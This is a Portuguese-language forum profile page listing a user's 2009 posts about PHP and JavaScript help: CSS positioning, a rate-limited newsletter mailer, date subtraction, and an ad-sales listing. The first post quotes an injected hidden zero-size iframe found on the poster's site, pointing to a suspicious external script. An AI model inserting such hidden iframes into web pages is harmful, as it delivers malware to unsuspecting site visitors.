Jump to content


blackmind's Content

There have been 7 items by blackmind (Search limited from 20/04/2023)


Ordernar por                Order  

#967034 Virus No Site

Posted by blackmind on 13/05/2009, 18:50 in PHP

Ola,

Antes de mais nada, nao sei se aqui é ra o lugar certo pra postar, mas preciso de ajuda,e aqui tem mais gente, desculpa mod...

Pessoal é o seguinte, parece coisa idiota mas nao é, ultimamente vi que meu pc estava estranho e nao abria mais nenhum site de antivirus... ate ai blz nao me encomodava... o problema foi quando ALGUNS usuarios do meu site reclamaram de 1 trojan no meu site, que o avast aponta,

SO QUE NO MEU CODIGO FONTE NAO MOSTRA NADA, NEM NO HTML AQUI, NEM PUXANDO O FONTE LA DO SITE (acho que o virus bloqueo ele para eu nao perceber)

valei com o pessoal do servidor (pois podia se intalar la) e eles acharam isso no meu codigo...

<!-- ~ --><iframe src="http://livelnternet....net/s/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ -->

como falei, pra mim nao mostra isso, será possivel o virus 'escrever' o codigo em algum certo horario? procurei na net e tem uma meia duzia com isso... bom cuidado ai pessoal, eu tenho uns 6 sites de clientes que passei pra eles.... se alguem tiver solucao posta ai

Valeu
o site é www.vianettv.com.br



#963682 Manipular Css Com Js

Posted by blackmind on 11/04/2009, 23:07 in Javascript / DOM / AJAX / ECMAScript

UIA funcionou,
Cara valeu mesmo, mas nao é bem questao mudar toda a resolucao, o site continua, é aonde o Div vai ser mostrado, pois com a diferenca de resolucoes ele muda o lugar... abraço e obrigado novamente



#963672 Manipular Css Com Js

Posted by blackmind on 11/04/2009, 21:13 in Javascript / DOM / AJAX / ECMAScript

[codebox]<div id="nome" class="demo" style="position:absolute; width:279px; left:<script>document.write(z) </script>; top:475px; visibility:visible; overflow: visible;" >
[/codebox]Fala pessoal blz?

é o seguinte... eu uso 1 JS pra saber a resolucao do navegador.... e ele atribui em 1 variavel cada resolucao... ate ai blz, so que na hora de imprimir o valor dentro do css eu nao consigo... vo mostrar o codigo

&lt;script language="javascript">
document.write ("Sua resolução de vídeo é "+screen.width+"x"+screen.height )
document.write ("<br>")
var x = screen.width;
if(x == 1280){
var z = 600+"px";
}
if(x == 1024){
var z = 400;
}

</script> // ate ai blz... agora vem o div e o problema...

<div id="nome" class="demo" style="position:absolute; width:279px; left:java script:document.write(z); top:475px; visibility:visible; overflow: visible;" >
OU
<div id="nome" class="demo" style="position:absolute; width:279px; left:<script>document.write(z) </script>; top:475px; visibility:visible; overflow: visible;" >

Valeu abraço



#961430 Venda De Publicidade

Posted by blackmind on 20/03/2009, 17:04 in Retorno Financeiro

URL: http://www.vianettv.com.br
VISITAS: 8.000 visitas por dia
MODELO: CPM
TAMANHO: 468x60, 120x240
POSIÇÃO: Topo, barra lateral, ao lado do conteúdo, acima do conteúdo
VALOR: planos R$45,00
ESTATISTICA: OpenAds
CONTATO: blackmind999@Hotmail.com



#959568 Envio Em Massa De Email

Posted by blackmind on 04/03/2009, 03:51 in PHP

Boa noite,

Tenho que enviar mais de 2.000 emails em uma newsletter, a conta do meu cliente é da locaweb, entrei em contato com eles e em falaram que o lmite de envio é de 270 / Hora

entao estou enviando 1 a cada segundo, acontece apos uns 10 minutos da pagina de envio ficar carregando mostra isso

Erro interno do Servidor!
O servidor encontrou um erro interno e não foi possível completar sua requisição. O servidor está sobrecarregado ou existe um erro em um script CGI.

Se você acredita ter encontrado um problema no servidor, por favor entre em contato com o webmaster.

Error 500

aparentemente meu script esta certo, gostaria de possiveis solucoes, sei que tem a classe phpmailer mas nunca a utilizei, e gostaria de usar so em ultimo caso, vo colocar os codigos abaixo...

$sql = mysql_query("SELECT email, nome FROM empresas");
while ($vetor = mysql_fetch_array($sql)){
$emailbd = $vetor[id];
$nomebd = $vetor[nome];

/* Remetente */
$nome = 'Formatura.com.br';
$email = 'vendas@formatura.com.br';

/* Destinatário */
$nome_destino = $nomebd;
$email_destino = $emailbd;

/* assunto */
$subject = ".:: {$titulo} ::.";

/* mensagem */
$message = "
<html>
<head>
<title>.:: Formatura.com.br ::.</title>
<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'>
</head>
<body>
$conteudo
</body>
</html>";

/* Para enviar email HTML, você precisa definir o header Content-type. */
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";

/* headers adicionais */
$headers .= "To: $nome_destino <$email_destino>\r\n";
$headers .= "From: $nome <$email>\r\n";


//aqui acho que é o grande problema, li algo sobre um flush mas nao endenti o funcionamento
sleep (4);

/* Enviar o email */
mail($email_destino, $subject, $message, $headers);

echo "Newsletter Enviada para o $emailbd<br>";

}
echo "<br><br>Newsletter Enviada teste<br>";




#955662 Resultadao De 2 Datas (inteiras)

Posted by blackmind on 28/01/2009, 00:01 in PHP

isso mesmo, por sinal, consequi esse script no forum...

$inicio = $data_i; // variavel que vem do banco
$fim = $data_f; // variavel que vem do banco
function tempo($string) {
$dia = substr($string, 8, 2);
$mes = substr($string, 5, 2);
$ano = substr($string, 0, 4);
return mktime($mes, $dia, $ano);
}

$a = (tempo($fim) - tempo($inicio));

echo $a;

só que isso ta dentro de um while, e no segundo loopo ele mostra esse erro
Fatal error: Cannot redeclare tempo() (previously declared in /home/formatura1/public_html/sim/modulos/home/index.php:129) in /home/formatura1/public_html/sim/modulos/home/index.php on line 129

valeu ai



#955659 Resultadao De 2 Datas (inteiras)

Posted by blackmind on 27/01/2009, 23:43 in PHP

Opa blz?


to com uma duvida aqui, eu tenho 2 datas 01/02/2009 e 01/05/2010 queria obter o resultado da subtração delas, vi alguns scripts mas noteu que todos quebram as datas para pegar os dias e mes....

nao tem uma forma do php fazer isso sosinho?




IPB Skin By Virteq